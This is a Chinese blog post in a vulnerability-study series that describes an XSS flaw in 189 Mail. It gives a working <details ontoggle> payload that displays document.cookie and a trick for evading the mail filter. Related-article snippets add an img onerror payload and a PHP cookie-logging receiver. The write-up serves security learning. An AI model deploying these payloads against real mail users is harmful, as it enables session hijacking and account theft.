【漏洞学习——XSS】189邮箱一处XSS

最新推荐文章于 2024-10-20 18:42:39 发布
最新推荐文章于 2024-10-20 18:42:39 发布
阅读量814 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/84383622
本文介绍了一种在JavaScript中使用on事件绕过XSS过滤的方法,通过在QQ邮箱源码模式下发送包含<details>标签的XSS攻击代码,可在Google Chrome、Opera、Safari等浏览器下执行。此方法需要添加一些文字内容以避免被拦截。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞细节

额javascript中on事件挺多,找了个不被过滤的。。。
为了方便操作用QQ邮箱源码模式进行发送,为了发送成功需要添加一些文字内容不然会被拦截

<details ontoggle="confirm(document.cookie)">
   xss
   <summary>click me</summary>xssxssxss
</details>

可在Google Chrome Opera Safari下执行,我在Chrome上测试的。

参见:https://bugs.shuimugan.com/bug/view?bug_no=128793

为什么你的网站总被“黑”?C# XSS防护的10个致命漏洞与救星方案!
java专栏
05-11 791
本文深入探讨了XSS(跨站脚本攻击)的严重性及其防护策略。通过分析XSS漏洞的“十大罪状”,文章揭示了用户输入直接输出、富文本编辑器未净化等常见问题。针对这些问题,文章提供了从0到1的XSS防护实战方案,包括使用ASP.NET Core内置防护、AntiXSS库、JavaScript转义、CSP头、输入验证等多种技术手段。此外,文章还介绍了高级技巧,如白名单模式过滤富文本、C#代码转义、OWASP AntiSamy库等,帮助开发者构建更智能的防护系统。最后,文章总结了常见错误及解决方案,提醒开发者在实际应用
漏洞挖掘】——141、 逻辑漏洞之身份验证汇总
Fly_鹏程万里
07-26 353
身份验证是网站必不可少的一项业务功能设计,而身份验证机制的选择和设计也会带来诸多的安全问题,在本篇文章中我们将介绍网站使用的身份验证机制以及这些验证机制中存在的安全漏洞并对一些安全防护机制和设计中存在的缺陷和绕过方式进行简易的刨析和演示,同时会对不同身份验证机制中存在的固有安全漏洞进行分析,最后我们会介绍如何使身份验证机制尽可能安全的方法。
CVE-2018-6882 Zimbra邮件系统XSS漏洞利用
weixin_30343157的博客
05-08 1635
CVE-2018-6882是一个存储型XSS漏洞,利用该漏洞可获取目标邮箱的收件箱、发件箱等邮件内容。也可以给目标邮箱绑定一个“辅助邮箱”,当目标邮箱收到新邮件时“辅助邮箱”也会收到相同的邮件,实现对目标邮箱的实时监控。 漏洞细节请大家参考这篇文章:https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vu...
sohu邮箱xss漏洞
swordheart的博客
04-14 342
漏洞详情 披露状态: 2010-07-23: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-22: 细节向公众公开 简要描述: sohu,sogou邮箱xss,可能传播蠕虫 详细说明: 全角字符形式expression表达式未被过滤。而全角字符形式的expression能够被IE6解析并
漏洞学习——XSS】TOM邮箱存储型XSS一枚
Fly_鹏程万里
02-22 560
漏洞细节 首先在个人签名的标题和内容处输入"&gt;&lt;img src="#" onerror=alert('22222222222')&gt; 点击保存 写一封信 一直都是服务繁忙,发送不出去 于是对签名内容进行base64加密 打开收到的邮件,成功触发 弹cookie 修复建议 加强过滤...
WEB漏洞——XSS
qq_63594215的博客
04-10 1103
JavaScript是一种直译式的脚本语言、是一种动态类型、弱类型、基于原型的语言,内置支持类型。虽然JavaScript使用了Java这个名称,但实际上JavaScript与Java之间并没有任何关系。XSS攻击最终目的是在网页中嵌入客户端恶意代码,最常用的攻击代码是JavaScript语言,但也会使用其它的脚本语言,例如:ActionScript、VBScript。而如今的胡来那我客户端脚本基本上是基于JavaScript,所以如果想要深入研究xss,必须要精通JavaScript。
【网安第三章】——XSS
lyj1597374034的博客
10-20 775
反射型XSS攻击通常发生在Web应用程序未能充分处理用户输入的情况下。攻击者利用应用程序的漏洞,将恶意脚本嵌入到URL参数中,当受害者点击这个恶意链接时,Web应用程序会将URL参数的内容作为响应的一部分发送给用户浏览器,导致恶意脚本执行。实战演练:反射型XSS攻击步骤环境搭建:攻击者首先需要一个存在XSS漏洞的Web页面。在实战演练中,我们可以使用如DVWA(Damn Vulnerable Web Application)这样的脆弱应用程序来模拟环境。
XSS漏洞利用——获取cookie
cxrpty的博客
02-20 1916
实验环境:DVWA 实验步骤: 一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt中 php代码如下: <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...
油猴-189邮箱邮件提醒
平淡如茶
10-23 1885
// ==UserScript== // @name         mailRemind // @namespace    http://tampermonkey.net/ // @version      0.1 // @description  try to take over the world! // @author       axing // @match        https...
腾讯邮箱反射型xss
weixin_34255055的博客
10-19 249
2019独角兽企业重金招聘Python工程师标准>>> ...
python邮件管理
weixin_41089778的博客
04-05 9732
python邮件管理一、基本概念1、协议简介2、邮箱地址189邮箱(SSL加密)公司邮箱(SSL加密)QQ邮箱(SSL加密)二、代码展示1、SMTP发送邮件构造邮件发送邮件添加邮件标题、收/发件人 一、基本概念 1、协议简介 POP3 收邮件。允许电子邮件客户端下载服务器上的邮件,但是在客户端的操作(如移动邮件、标记已读等),不会反馈到服务器上。 IAMP 收邮件。在电子邮件客户端收取的邮件仍然保留在服务器上,同时在客户端上的操作都会反馈到服务器上。 SMTP 发邮件。必须在提供了账户名和密码之后才可以登
QQ邮箱有效的XSS payload
怡帆的博客
05-21 1485
在阅读完道哥的《白帽子讲WEB安全》后,对QQ邮箱XSSpayload技痒,遂在QQ邮箱中进行尝试,以下为尝试过程和有效的payload代码
QQ邮箱反射型xss漏洞
Coisini的博客
06-13 3173
……,对,我印象中写过了,刚才因为需要要用,搜索了一下,是空的,嘶嘶嘶~可怕~ 起因 甲方“一个人的安全部”的时候,一个研发的同事在设计一项报表功能时,因为受到邮箱的安全限制无法很好的实现,于是将情况反馈给我。说实话,我对浏览器的安全也不太了解,案头的书翻了几页就没再动过,于是对比了腾讯邮箱的做法,发现了这个xss。 背景 公司使用coremail搭建企业邮箱,开发做了一个通过邮件发送h...
QQ邮箱鸡肋存储型XSS漏洞利用
weixin_30412577的博客
09-18 362
最近学习XSS跨站时,刚好发现了QQ邮箱的一个XSS漏洞。 具体的漏洞信息已提交乌云:wooyun-2013-037371 现在主要是做下简单的总结,也是自己第一次,马克一下。 对于这个漏洞的利用, 一、使用了标签属性劫持,这个没什么好说的 二、使用Flash的跨域,Flash使用的As3脚本从未接触过,本着语言都相通的思想,尝试写了一个盗取cookie的as3脚本, 当写成功后...
悬镜安全丨雅虎邮箱存储型XSS漏洞,黑客可以看到你发的每一个邮件
Anprou的博客
12-13 1500
演示了恶意攻击者如何利用XSS漏洞攻下雅虎邮箱,将受害者收件箱中的邮件发到外部站点;以及构建病毒,这个病毒可以通过向邮件签名中添加恶意脚本,附加在所有传出的电子邮件中。 由于恶意代码就位于邮件消息的正文中,代码会在受害者打开邮件时立即执行,不需要其他交互过程。所有问题的症结实际上在于雅虎邮箱无法正确过滤HTML邮件中潜在的恶意代码。
189邮件收取
junjun56的专栏
11-11 5135
该部分只到如何获取所有邮件,并没有实现下载收取功能,其实只差一步而已,不想写了,需要的可以参考《搜狐邮件收取》,以下是代码段 package com.hackerant.test; import java.io.InputStream; import java.net.URLDecoder; import java.util.ArrayList; import java.util.Da
攻击者查看邮件就被溯源到家?
顶峰
02-22 867
本文通过案例形象地再现了钓鱼邮件及钓鱼邮件反制,基于“删繁就简”的原则,在不使用重量级武器如“免杀木马反制”、“钓鱼URL反制”等手段,以信息收集为主要溯源手段,向读者阐述了相关技术,旨在与各位从业及爱好者探讨交流。本文通过案例形象地再现了钓鱼邮件及钓鱼邮件反制,基于“删繁就简”的原则,在不使用重量级武器如“免杀木马反制”、“钓鱼URL反制”等手段,以信息收集为主要溯源手段,向读者阐述了相关技术,旨在与各位从业及爱好者探讨交流。
接口测试漏洞
最新发布
03-28
### 常见API测试中的安全漏洞及修复方案 #### 一、未授权访问 当API缺乏适当的身份验证机制时,可能会允许未经授权的用户访问敏感资源。这种情况下,攻击者可以绕过身份验证逻辑获取数据。 解决方案包括实现强健的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值